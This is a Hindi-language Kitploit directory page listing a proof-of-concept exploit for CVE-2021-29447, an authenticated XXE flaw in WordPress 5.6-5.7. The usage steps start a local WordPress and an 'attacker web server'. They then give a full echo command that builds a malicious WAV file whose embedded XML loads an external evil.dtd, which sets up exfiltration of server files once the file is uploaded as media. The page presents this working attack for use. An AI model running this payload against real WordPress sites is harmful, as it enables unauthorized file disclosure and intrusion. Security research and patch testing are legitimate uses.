Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-29447 — WordPress - प्रमाणित XXE (CVE-2021-29447) | Kitploit
उपकरण/GitHubGitHub/motikan2010/cve-2021-29447
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubmotikan2010/cve-2021-29447

CVE-2021-29447

WordPress - प्रमाणित XXE (CVE-2021-29447)

रिपॉजिटरी देखें
43114 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WordPress 5.6-5.7 - प्रमाणित (लेखक+) XXE (CVE-2021-29447)

उपयोग

चरण 1. WordPress चलाएं

$ make up-wp

चरण 2. हमलावर वेब सर्वर चलाएं

$ make up-mal

चरण 3. दुर्भावनापूर्ण WAV फ़ाइल उत्पन्न करें

wavefile npm के बिना (अनुशंसित)

$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

wavefile npm के साथ

$ make make-wav

चरण 4. WordPress में लॉग इन करें और नए मीडिया में WAV फ़ाइल अपलोड करें

चरण 5. डीकोड करें

संदर्भ

  • WordPress 5.6-5.7 - मीडिया लाइब्रेरी में प्रमाणित XXE जो PHP 8 सुरक्षा कमजोरी को प्रभावित करता है
टूल डाउनलोड करें